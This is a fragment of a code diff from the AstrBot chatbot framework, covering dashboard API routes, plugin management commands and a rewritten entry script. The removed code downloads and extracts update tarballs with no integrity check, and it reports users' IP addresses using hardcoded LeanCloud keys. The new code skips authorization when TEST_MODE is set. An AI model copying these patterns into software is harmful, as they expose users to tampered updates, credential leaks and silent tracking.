message="保存成功~ 机器人将在 3 秒内重启以应用新的配置。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extension-configs")
|
||||
def post_extension_configs():
|
||||
post_configs = request.json
|
||||
try:
|
||||
self.save_extension_configs(post_configs)
|
||||
return Response(
|
||||
status="success",
|
||||
message="保存成功~ 机器人将在 3 秒内重启以应用新的配置。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/extensions")
|
||||
def get_plugins():
|
||||
_plugin_resp = []
|
||||
for plugin in self.context.cached_plugins:
|
||||
_p = plugin.metadata
|
||||
_t = {
|
||||
"name": _p.plugin_name,
|
||||
"repo": '' if _p.repo is None else _p.repo,
|
||||
"author": _p.author,
|
||||
"desc": _p.desc,
|
||||
"version": _p.version
|
||||
}
|
||||
_plugin_resp.append(_t)
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=_plugin_resp
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/install")
|
||||
def install_plugin():
|
||||
post_data = request.json
|
||||
repo_url = post_data["url"]
|
||||
try:
|
||||
logger.info(f"正在安装插件 {repo_url}")
|
||||
# self.plugin_manager.install_plugin(repo_url)
|
||||
asyncio.run_coroutine_threadsafe(self.plugin_manager.install_plugin(repo_url), self.loop).result()
|
||||
threading.Thread(target=self.astrbot_updator._reboot, args=(2, self.context)).start()
|
||||
logger.info(f"安装插件 {repo_url} 成功,2秒后重启")
|
||||
return Response(
|
||||
status="success",
|
||||
message="安装成功,机器人将在 2 秒内重启。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/extensions/install: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/upload-install")
|
||||
def upload_install_plugin():
|
||||
try:
|
||||
file = request.files['file']
|
||||
print(file.filename)
|
||||
logger.info(f"正在安装用户上传的插件 {file.filename}")
|
||||
file_path = f"data/temp/{uuid.uuid4()}.zip"
|
||||
file.save(file_path)
|
||||
self.plugin_manager.install_plugin_from_file(file_path)
|
||||
logger.info(f"安装插件 {file.filename} 成功")
|
||||
return Response(
|
||||
status="success",
|
||||
message="安装成功~",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/extensions/upload-install: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/uninstall")
|
||||
def uninstall_plugin():
|
||||
post_data = request.json
|
||||
plugin_name = post_data["name"]
|
||||
try:
|
||||
logger.info(f"正在卸载插件 {plugin_name}")
|
||||
self.plugin_manager.uninstall_plugin(plugin_name)
|
||||
logger.info(f"卸载插件 {plugin_name} 成功")
|
||||
return Response(
|
||||
status="success",
|
||||
message="卸载成功~",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/extensions/uninstall: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/update")
|
||||
def update_plugin():
|
||||
post_data = request.json
|
||||
plugin_name = post_data["name"]
|
||||
try:
|
||||
logger.info(f"正在更新插件 {plugin_name}")
|
||||
# self.plugin_manager.update_plugin(plugin_name)
|
||||
asyncio.run_coroutine_threadsafe(self.plugin_manager.update_plugin(plugin_name), self.loop).result()
|
||||
threading.Thread(target=self.astrbot_updator._reboot, args=(2, self.context)).start()
|
||||
logger.info(f"更新插件 {plugin_name} 成功,2秒后重启")
|
||||
return Response(
|
||||
status="success",
|
||||
message="更新成功,机器人将在 2 秒内重启。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/extensions/update: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/log")
|
||||
def log():
|
||||
for item in self.ws_clients:
|
||||
try:
|
||||
asyncio.run_coroutine_threadsafe(
|
||||
self.ws_clients[item].send(request.data.decode()), self.loop).result()
|
||||
except Exception as e:
|
||||
pass
|
||||
return 'ok'
|
||||
|
||||
@self.dashboard_be.get("/api/check_update")
|
||||
def get_update_info():
|
||||
try:
|
||||
# ret = self.astrbot_updator.check_update(None, None)
|
||||
ret = asyncio.run_coroutine_threadsafe(
|
||||
self.astrbot_updator.check_update(None, None), self.loop).result()
|
||||
return Response(
|
||||
status="success",
|
||||
message=str(ret) if ret is not None else "已经是最新版本了。",
|
||||
data={
|
||||
"has_new_version": ret is not None
|
||||
}
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/check_update: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/update_project")
|
||||
def update_project_api():
|
||||
version = request.json['version']
|
||||
if version == "" or version == "latest":
|
||||
latest = True
|
||||
version = ''
|
||||
else:
|
||||
latest = False
|
||||
try:
|
||||
# await self.astrbot_updator.update(latest=latest, version=version)
|
||||
asyncio.run_coroutine_threadsafe(self.astrbot_updator.update(latest=latest, version=version), self.loop).result()
|
||||
threading.Thread(target=self.astrbot_updator._reboot, args=(2, self.context)).start()
|
||||
return Response(
|
||||
status="success",
|
||||
message="更新成功,机器人将在 3 秒内重启。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/update_project: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/llm/list")
|
||||
def llm_list():
|
||||
ret = []
|
||||
for llm in self.context.llms:
|
||||
ret.append(llm.llm_name)
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=ret
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/llm")
|
||||
def llm():
|
||||
text = request.args["text"]
|
||||
llm = request.args["llm"]
|
||||
for llm_ in self.context.llms:
|
||||
if llm_.llm_name == llm:
|
||||
try:
|
||||
ret = asyncio.run_coroutine_threadsafe(
|
||||
llm_.llm_instance.text_chat(text), self.loop).result()
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=ret
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
return Response(
|
||||
status="error",
|
||||
message="LLM not found.",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
def save_astrbot_configs(self, post_configs: dict):
|
||||
try:
|
||||
self.dashboard_helper.save_astrbot_config(post_configs)
|
||||
threading.Thread(target=self.astrbot_updator._reboot, args=(3, self.context), daemon=True).start()
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
def save_extension_configs(self, post_configs: dict):
|
||||
try:
|
||||
self.dashboard_helper.save_extension_config(post_configs)
|
||||
threading.Thread(target=self.astrbot_updator._reboot, args=(3, self.context), daemon=True).start()
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
def _get_astrbot_config(self):
|
||||
config = self.context.config_helper.to_dict()
|
||||
for key in self.dashboard_helper.config_key_dont_show:
|
||||
if key in config:
|
||||
del config[key]
|
||||
return {
|
||||
"metadata": CONFIG_METADATA_2,
|
||||
"config": config,
|
||||
}
|
||||
|
||||
def _get_extension_config(self, namespace: str):
|
||||
path = f"data/config/{namespace}.json"
|
||||
if not os.path.exists(path):
|
||||
return []
|
||||
with open(path, "r", encoding="utf-8-sig") as f:
|
||||
return [{
|
||||
"config_type": "group",
|
||||
"name": namespace + " 插件配置",
|
||||
"description": "",
|
||||
"body": list(json.load(f).values())
|
||||
},]
|
||||
|
||||
async def get_log_history(self):
|
||||
try:
|
||||
with open("logs/astrbot/astrbot.log", "r", encoding="utf-8") as f:
|
||||
return f.readlines()[-100:]
|
||||
except Exception as e:
|
||||
logger.warning(f"读取日志历史失败: {e.__str__()}")
|
||||
return []
|
||||
|
||||
async def __handle_msg(self, websocket, path):
|
||||
address = websocket.remote_address
|
||||
self.ws_clients[address] = websocket
|
||||
data = await self.get_log_history()
|
||||
data = ''.join(data).replace('\n', '\r\n')
|
||||
await websocket.send(data)
|
||||
while True:
|
||||
try:
|
||||
msg = await websocket.recv()
|
||||
except websockets.exceptions.ConnectionClosedError:
|
||||
# logger.info(f"和 {address} 的 websocket 连接已断开")
|
||||
del self.ws_clients[address]
|
||||
break
|
||||
except Exception as e:
|
||||
# logger.info(f"和 {path} 的 websocket 连接发生了错误: {e.__str__()}")
|
||||
del self.ws_clients[address]
|
||||
break
|
||||
|
||||
async def ws_server(self):
|
||||
ws_server = websockets.serve(self.__handle_msg, "0.0.0.0", 6186)
|
||||
logger.info("WebSocket 服务器已启动。")
|
||||
await ws_server
|
||||
|
||||
def http_server(self):
|
||||
http_server = make_server(
|
||||
'0.0.0.0', 6185, self.dashboard_be, threaded=True)
|
||||
http_server.serve_forever()
|
||||
|
||||
def run_http_server(self):
|
||||
self.http_server_thread = threading.Thread(target=self.http_server, daemon=True).start()
|
||||
ip_address = get_local_ip_addresses()
|
||||
ip_str = f"http://{ip_address}:6185"
|
||||
logger.info(f"HTTP 服务器已启动,可访问: {ip_str} 等来登录可视化面板。")
|
||||
209
main.py
@@ -1,168 +1,63 @@
|
||||
import threading
|
||||
import time
|
||||
|
||||
import os
|
||||
import asyncio
|
||||
import os, sys
|
||||
import signal
|
||||
import requests,json
|
||||
import sys
|
||||
import warnings
|
||||
import traceback
|
||||
import mimetypes
|
||||
from astrbot.bootstrap import AstrBotBootstrap
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Formatter
|
||||
|
||||
# 是否是windows打包。一般人不需要改这个,这个只是我为了方便加上的。
|
||||
win_compile_mode = False
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
|
||||
|
||||
|
||||
def main(loop, event):
|
||||
import cores.qqbot.core as qqBot
|
||||
from cores.openai.core import ChatGPT
|
||||
#实例化ChatGPT
|
||||
chatgpt = ChatGPT()
|
||||
# #执行qqBot
|
||||
qqBot.initBot(chatgpt)
|
||||
|
||||
# 仅支持linux
|
||||
def hot_update(ver):
|
||||
target = 'target.tar'
|
||||
time.sleep(5)
|
||||
while(True):
|
||||
if os.path.exists('version.txt'):
|
||||
version_file = open('version.txt', 'r', encoding='utf-8')
|
||||
vs = version_file.read()
|
||||
version = float(vs)
|
||||
else:
|
||||
version = 0
|
||||
if not os.path.exists(target):
|
||||
version = 0
|
||||
try:
|
||||
res = requests.get("https://soulter.top/channelbot/update.json")
|
||||
res_obj = json.loads(res.text)
|
||||
ol_version = float(res_obj['version'])
|
||||
if ol_version > version:
|
||||
print('发现新版本: ' + str(ol_version))
|
||||
res = requests.get(res_obj['linux-url'], stream=True)
|
||||
filesize = res.headers["Content-Length"]
|
||||
print('文件大小: ' + str(int(filesize) / 1024 / 1024) + 'MB')
|
||||
print('正在更新文件...')
|
||||
chunk_size = 1024
|
||||
times = int(filesize) // chunk_size
|
||||
show = 1 / times
|
||||
show2 = 1 / times
|
||||
start = 1
|
||||
with open(target, "wb") as pyFile:
|
||||
for chunk in res.iter_content(chunk_size=chunk_size):
|
||||
if chunk:
|
||||
pyFile.write(chunk)
|
||||
if start <= times:
|
||||
print(f"\r下载进度: {show:.2%}",end="",flush=True)
|
||||
start += 1
|
||||
show += show2
|
||||
else:
|
||||
sys.stdout.write(f"下载进度: 100%\n")
|
||||
print('更新完成')
|
||||
print('解压覆盖')
|
||||
os.system(f"tar -zxvf {target}")
|
||||
version = ol_version
|
||||
version_file = open('version.txt', 'w+', encoding='utf-8')
|
||||
version_file.write(str(res_obj['version']))
|
||||
version_file.flush()
|
||||
version_file.close()
|
||||
|
||||
try:
|
||||
update_version(version)
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
|
||||
print('自启动')
|
||||
py = sys.executable
|
||||
os.execl(py, py, *sys.argv)
|
||||
time.sleep(60*20)
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
print("upd出现异常,请联系QQ905617992")
|
||||
time.sleep(60*20)
|
||||
|
||||
|
||||
def update_version(ver):
|
||||
if not os.path.exists('update_record'):
|
||||
object_id = ''
|
||||
else:
|
||||
object_id = open("update_record", 'r', encoding='utf-8').read()
|
||||
addr = 'unknown'
|
||||
warnings.filterwarnings("ignore")
|
||||
logo_tmpl = r"""
|
||||
___ _______.___________..______ .______ ______ .___________.
|
||||
/ \ / | || _ \ | _ \ / __ \ | |
|
||||
/ ^ \ | (----`---| |----`| |_) | | |_) | | | | | `---| |----`
|
||||
/ /_\ \ \ \ | | | / | _ < | | | | | |
|
||||
/ _____ \ .----) | | | | |\ \----.| |_) | | `--' | | |
|
||||
/__/ \__\ |_______/ |__| | _| `._____||______/ \______/ |__|
|
||||
|
||||
"""
|
||||
|
||||
def main():
|
||||
global logger
|
||||
try:
|
||||
addr = requests.get('http://myip.ipip.net', timeout=5).text
|
||||
except BaseException:
|
||||
pass
|
||||
try:
|
||||
ts = str(time.time())
|
||||
# md = hashlib.md5((ts+'QAZ1rQLY1ZufHrZlpuUiNff7').encode())
|
||||
headers = {
|
||||
'X-LC-Id': 'UqfXTWW15nB7iMT0OHvYrDFb-gzGzoHsz',
|
||||
'X-LC-Key': 'QAZ1rQLY1ZufHrZlpuUiNff7',
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
d = {"data": {'version':'win-hot-update'+str(ver), 'addr': addr}}
|
||||
d = json.dumps(d).encode("utf-8")
|
||||
res = requests.put(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/version_record/{object_id}', headers = headers, data = d)
|
||||
if json.loads(res.text)['code'] == 1:
|
||||
res = requests.post(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/version_record', headers = headers, data = d)
|
||||
object_id = json.loads(res.text)['objectId']
|
||||
object_id_file = open("update_record", 'w+', encoding='utf-8')
|
||||
object_id_file.write(str(object_id))
|
||||
object_id_file.flush()
|
||||
object_id_file.close()
|
||||
import botpy, logging
|
||||
# delete qqbotpy's logger
|
||||
for handler in logging.root.handlers[:]:
|
||||
logging.root.removeHandler(handler)
|
||||
|
||||
logger.info(logo_tmpl)
|
||||
|
||||
bootstrap = AstrBotBootstrap()
|
||||
asyncio.run(bootstrap.run())
|
||||
except KeyboardInterrupt:
|
||||
logger.info("AstrBot 已退出。")
|
||||
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
logger.error(traceback.format_exc())
|
||||
|
||||
def check_env():
|
||||
if not (sys.version_info.major == 3 and sys.version_info.minor >= 8):
|
||||
print("请使用Python3.8运行本项目")
|
||||
input("按任意键退出...")
|
||||
if not (sys.version_info.major == 3 and sys.version_info.minor >= 9):
|
||||
logger.error("请使用 Python3.9+ 运行本项目。")
|
||||
exit()
|
||||
try:
|
||||
import openai
|
||||
import botpy
|
||||
import yaml
|
||||
except Exception as e:
|
||||
# print(e)
|
||||
try:
|
||||
print("安装依赖库中...")
|
||||
os.system("pip3 install openai")
|
||||
os.system("pip3 install qq-botpy")
|
||||
os.system("pip3 install pyyaml")
|
||||
print("安装依赖库完毕...")
|
||||
except BaseException:
|
||||
print("\n安装第三方库异常.请自行安装或者联系QQ905617992.")
|
||||
|
||||
# 检查key
|
||||
with open(abs_path+"configs/config.yaml", 'r', encoding='utf-8') as ymlfile:
|
||||
import yaml
|
||||
cfg = yaml.safe_load(ymlfile)
|
||||
if cfg['openai']['key'] == '' or cfg['openai']['key'] == None:
|
||||
print("请先在configs/config.yaml下添加一个可用的OpenAI Key。详情请前往https://beta.openai.com/account/api-keys")
|
||||
if cfg['qqbot']['appid'] == '' or cfg['qqbot']['token'] == '' or cfg['qqbot']['appid'] == None or cfg['qqbot']['token'] == None:
|
||||
print("请先在configs/config.yaml下完善appid和token令牌(在https://q.qq.com/上注册一个QQ机器人即可获得)")
|
||||
|
||||
def get_platform():
|
||||
import platform
|
||||
sys_platform = platform.platform().lower()
|
||||
if "windows" in sys_platform:
|
||||
return "win"
|
||||
elif "macos" in sys_platform:
|
||||
return "mac"
|
||||
elif "linux" in sys_platform:
|
||||
return "linux"
|
||||
else:
|
||||
print("other")
|
||||
os.makedirs("data/config", exist_ok=True)
|
||||
os.makedirs("data/plugins", exist_ok=True)
|
||||
os.makedirs("data/temp", exist_ok=True)
|
||||
|
||||
# workaround for issue #181
|
||||
mimetypes.add_type("text/javascript", ".js")
|
||||
mimetypes.add_type("text/javascript", ".mjs")
|
||||
mimetypes.add_type("application/json", ".json")
|
||||
|
||||
if __name__ == "__main__":
|
||||
global pid
|
||||
pid = os.getpid()
|
||||
global ma_type
|
||||
print("程序PID:"+str(pid))
|
||||
check_env()
|
||||
bot_event = threading.Event()
|
||||
loop = asyncio.get_event_loop()
|
||||
ma_type = get_platform()
|
||||
if ma_type == 'linux':
|
||||
threading.Thread(target=hot_update).start()
|
||||
|
||||
main(loop, bot_event)
|
||||
|
||||
logger = LogManager.GetLogger(
|
||||
log_name='astrbot',
|
||||
out_to_console=True,
|
||||
custom_formatter=Formatter('[%(asctime)s| %(name)s - %(levelname)s|%(filename)s:%(lineno)d]: %(message)s', datefmt="%H:%M:%S")
|
||||
)
|
||||
main()
|
||||
|
||||
276
model/command/internal_handler.py
Normal file
@@ -0,0 +1,276 @@
|
||||
import aiohttp, os
|
||||
|
||||
from model.command.manager import CommandManager
|
||||
from model.plugin.manager import PluginManager
|
||||
from type.message_event import AstrMessageEvent
|
||||
from type.command import CommandResult
|
||||
from type.types import Context
|
||||
from type.config import VERSION
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from util.agent.web_searcher import search_from_bing, fetch_website_content
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class InternalCommandHandler:
|
||||
def __init__(self, manager: CommandManager, plugin_manager: PluginManager) -> None:
|
||||
self.manager = manager
|
||||
self.plugin_manager = plugin_manager
|
||||
|
||||
self.manager.register("help", "查看帮助", 10, self.help)
|
||||
self.manager.register("wake", "唤醒前缀", 10, self.set_nick)
|
||||
self.manager.register("update", "更新管理", 10, self.update)
|
||||
self.manager.register("plugin", "插件管理", 10, self.plugin)
|
||||
self.manager.register("reboot", "重启 AstrBot", 10, self.reboot)
|
||||
self.manager.register("websearch", "网页搜索", 10, self.web_search)
|
||||
self.manager.register("t2i", "文转图", 10, self.t2i_toggle)
|
||||
self.manager.register("myid", "用户ID", 10, self.myid)
|
||||
self.manager.register("provider", "LLM 接入源", 10, self.provider)
|
||||
|
||||
def _check_auth(self, message: AstrMessageEvent, context: Context):
|
||||
if os.environ.get("TEST_MODE", "off") == "on":
|
||||
return
|
||||
if message.role != "admin":
|
||||
user_id = message.message_obj.sender.user_id
|
||||
raise Exception(f"用户(ID: {user_id}) 没有足够的权限使用该指令。")
|
||||
|
||||
def provider(self, message: AstrMessageEvent, context: Context):
|
||||
if len(context.llms) == 0:
|
||||
return CommandResult().message("当前没有加载任何 LLM 接入源。")
|
||||
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
|
||||
if tokens.len == 1:
|
||||
ret = "## 当前载入的 LLM 接入源\n"
|
||||
for idx, llm in enumerate(context.llms):
|
||||
ret += f"{idx}. {llm.llm_name}"
|
||||
if llm.origin:
|
||||
ret += f" (来源: {llm.origin})"
|
||||
if context.message_handler.provider == llm.llm_instance:
|
||||
ret += " (当前使用)"
|
||||
ret += "\n"
|
||||
|
||||
ret += "\n使用 provider <序号> 切换 LLM 接入源。"
|
||||
return CommandResult().message(ret)
|
||||
else:
|
||||
try:
|
||||
idx = int(tokens.get(1))
|
||||
if idx >= len(context.llms):
|
||||
return CommandResult().message("provider: 无效的序号。")
|
||||
context.message_handler.set_provider(context.llms[idx].llm_instance)
|
||||
return CommandResult().message(f"已经成功切换到 LLM 接入源 {context.llms[idx].llm_name}。")
|
||||
except BaseException as e:
|
||||
return CommandResult().message("provider: 参数错误。")
|
||||
|
||||
def set_nick(self, message: AstrMessageEvent, context: Context):
|
||||
self._check_auth(message, context)
|
||||
message_str = message.message_str
|
||||
l = message_str.split(" ")
|
||||
if len(l) == 1:
|
||||
return CommandResult().message(f"设置机器人唤醒词。以唤醒词开头的消息会唤醒机器人处理,起到 @ 的效果。\n示例:wake 昵称。当前唤醒词是:{context.config_helper.wake_prefix[0]}")
|
||||
nick = l[1].strip()
|
||||
if not nick:
|
||||
return CommandResult().message("wake: 请指定唤醒词。")
|
||||
context.config_helper.wake_prefix = [nick]
|
||||
context.config_helper.save_config()
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=f"已经成功将唤醒前缀设定为 {nick}。",
|
||||
)
|
||||
|
||||
async def update(self, message: AstrMessageEvent, context: Context):
|
||||
self._check_auth(message, context)
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
update_info = await context.updator.check_update(None, None)
|
||||
if tokens.len == 1:
|
||||
ret = ""
|
||||
if not update_info:
|
||||
ret = f"当前已经是最新版本 v{VERSION}。"
|
||||
else:
|
||||
ret = f"发现新版本 {update_info.version},更新内容如下:\n---\n{update_info.body}\n---\n- 使用 /update latest 更新到最新版本。\n- 使用 /update vX.X.X 更新到指定版本。"
|
||||
return CommandResult().message(ret)
|
||||
else:
|
||||
if tokens.get(1) == "latest":
|
||||
try:
|
||||
await context.updator.update()
|
||||
return CommandResult().message(f"已经成功更新到最新版本 v{update_info.version}。要应用更新,请重启 AstrBot。输入 /reboot 即可重启")
|
||||
except BaseException as e:
|
||||
return CommandResult().message(f"更新失败。原因:{str(e)}")
|
||||
elif tokens.get(1).startswith("v"):
|
||||
try:
|
||||
await context.updator.update(version=tokens.get(1))
|
||||
return CommandResult().message(f"已经成功更新到版本 v{tokens.get(1)}。要应用更新,请重启 AstrBot。输入 /reboot 即可重启")
|
||||
except BaseException as e:
|
||||
return CommandResult().message(f"更新失败。原因:{str(e)}")
|
||||
else:
|
||||
return CommandResult().message("update: 参数错误。")
|
||||
|
||||
def reboot(self, message: AstrMessageEvent, context: Context):
|
||||
self._check_auth(message, context)
|
||||
context.updator._reboot(3, context)
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain="AstrBot 将在 3s 后重启。",
|
||||
)
|
||||
|
||||
async def plugin(self, message: AstrMessageEvent, context: Context):
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
if tokens.len == 1:
|
||||
ret = "# 插件指令面板 \n- 安装插件: `plugin i 插件Github地址`\n- 卸载插件: `plugin d 插件名`\n- 查看插件列表:`plugin l`\n - 更新插件: `plugin u 插件名`\n"
|
||||
return CommandResult().message(ret)
|
||||
|
||||
if tokens.get(1) == "l":
|
||||
plugin_list_info = ""
|
||||
for plugin in context.cached_plugins:
|
||||
plugin_list_info += f"- `{plugin.metadata.plugin_name}` By {plugin.metadata.author}: {plugin.metadata.desc}\n"
|
||||
if plugin_list_info.strip() == "":
|
||||
return CommandResult().message("plugin v: 没有找到插件。")
|
||||
return CommandResult().message(plugin_list_info)
|
||||
|
||||
self._check_auth(message, context)
|
||||
|
||||
if tokens.get(1) == "d":
|
||||
if tokens.len == 2:
|
||||
return CommandResult().message("plugin d: 请指定要卸载的插件名。")
|
||||
plugin_name = tokens.get(2)
|
||||
try:
|
||||
self.plugin_manager.uninstall_plugin(plugin_name)
|
||||
except BaseException as e:
|
||||
return CommandResult().message(f"plugin d: 卸载插件失败。原因:{str(e)}")
|
||||
return CommandResult().message(f"plugin d: 已经成功卸载插件 {plugin_name}。")
|
||||
|
||||
elif tokens.get(1) == "i":
|
||||
if tokens.len == 2:
|
||||
return CommandResult().message("plugin i: 请指定要安装的插件的 Github 地址,或者前往可视化面板安装。")
|
||||
plugin_url = tokens.get(2)
|
||||
try:
|
||||
await self.plugin_manager.install_plugin(plugin_url)
|
||||
except BaseException as e:
|
||||
return CommandResult().message(f"plugin i: 安装插件失败。原因:{str(e)}")
|
||||
return CommandResult().message("plugin i: 已经成功安装插件。")
|
||||
|
||||
elif tokens.get(1) == "u":
|
||||
if tokens.len == 2:
|
||||
return CommandResult().message("plugin u: 请指定要更新的插件名。")
|
||||
plugin_name = tokens.get(2)
|
||||
try:
|
||||
await context.plugin_updator.update(plugin_name)
|
||||
except BaseException as e:
|
||||
return CommandResult().message(f"plugin u: 更新插件失败。原因:{str(e)}")
|
||||
return CommandResult().message(f"plugin u: 已经成功更新插件 {plugin_name}。")
|
||||
|
||||
return CommandResult().message("plugin: 参数错误。")
|
||||
|
||||
async def help(self, message: AstrMessageEvent, context: Context):
|
||||
notice = ""
|
||||
try:
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get("https://soulter.top/channelbot/notice.json") as resp:
|
||||
notice = (await resp.json())["notice"]
|
||||
except BaseException as e:
|
||||
logger.warning("An error occurred while fetching astrbot notice. Never mind, it's not important.")
|
||||
|
||||
msg = "# 帮助中心\n## 指令\n"
|
||||
for key, value in self.manager.commands_handler.items():
|
||||
if value.plugin_metadata:
|
||||
msg += f"- `{key}` ({value.plugin_metadata.plugin_name}): {value.description}\n"
|
||||
else: msg += f"- `{key}`: {value.description}\n"
|
||||
# plugins
|
||||
if context.cached_plugins:
|
||||
plugin_list_info = ""
|
||||
for plugin in context.cached_plugins:
|
||||
plugin_list_info += f"- `{plugin.metadata.plugin_name}` {plugin.metadata.desc}\n"
|
||||
if plugin_list_info.strip() != "":
|
||||
msg += "\n## 插件\n> 使用plugin v 插件名 查看插件帮助\n"
|
||||
msg += plugin_list_info
|
||||
msg += notice
|
||||
|
||||
return CommandResult().message(msg)
|
||||
|
||||
def web_search(self, message: AstrMessageEvent, context: Context):
|
||||
l = message.message_str.split(' ')
|
||||
if len(l) == 1:
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=f"网页搜索功能当前状态: {context.config_helper.llm_settings.web_search}",
|
||||
)
|
||||
elif l[1] == 'on':
|
||||
context.config_helper.llm_settings.web_search = True
|
||||
context.config_helper.save_config()
|
||||
context.register_llm_tool("web_search", [{
|
||||
"type": "string",
|
||||
"name": "keyword",
|
||||
"description": "搜索关键词"
|
||||
}],
|
||||
"通过搜索引擎搜索。如果问题需要获取近期、实时的消息,在网页上搜索(如天气、新闻或任何需要通过网页获取信息的问题),则调用此函数;如果没有,不要调用此函数。",
|
||||
search_from_bing
|
||||
)
|
||||
context.register_llm_tool("fetch_website_content", [{
|
||||
"type": "string",
|
||||
"name": "url",
|
||||
"description": "要获取内容的网页链接"
|
||||
}],
|
||||
"获取网页的内容。如果问题带有合法的网页链接并且用户有需求了解网页内容(例如: `帮我总结一下 https://github.com 的内容`), 就调用此函数。如果没有,不要调用此函数。",
|
||||
fetch_website_content
|
||||
)
|
||||
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain="已开启网页搜索",
|
||||
)
|
||||
elif l[1] == 'off':
|
||||
context.config_helper.llm_settings.web_search = False
|
||||
context.config_helper.save_config()
|
||||
context.unregister_llm_tool("web_search")
|
||||
context.unregister_llm_tool("fetch_website_content")
|
||||
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain="已关闭网页搜索",
|
||||
)
|
||||
else:
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=False,
|
||||
message_chain="参数错误",
|
||||
)
|
||||
|
||||
def t2i_toggle(self, message: AstrMessageEvent, context: Context):
|
||||
p = context.config_helper.t2i
|
||||
if p:
|
||||
context.config_helper.t2i = False
|
||||
context.config_helper.save_config()
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain="已关闭文本转图片模式。",
|
||||
)
|
||||
context.config_helper.t2i = True
|
||||
context.config_helper.save_config()
|
||||
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain="已开启文本转图片模式。",
|
||||
)
|
||||
|
||||
def myid(self, message: AstrMessageEvent, context: Context):
|
||||
try:
|
||||
user_id = str(message.message_obj.sender.user_id)
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=f"你在此平台上的ID:{user_id}",
|
||||
)
|
||||
except BaseException as e:
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=False,
|
||||
message_chain=f"获取失败,原因: {str(e)}",
|
||||
)
|
||||
145
model/command/manager.py
Normal file
@@ -0,0 +1,145 @@
|
||||
import heapq
|
||||
import inspect
|
||||
import traceback
|
||||
from typing import Dict
|
||||
from type.types import Context
|
||||
from type.plugin import PluginMetadata
|
||||
from type.message_event import AstrMessageEvent
|
||||
from type.command import CommandResult
|
||||
from type.register import RegisteredPlugins
|
||||
from model.command.parser import CommandParser
|
||||
from model.plugin.command import PluginCommandBridge
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from dataclasses import dataclass
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
@dataclass
|
||||
class CommandMetadata():
|
||||
inner_command: bool
|
||||
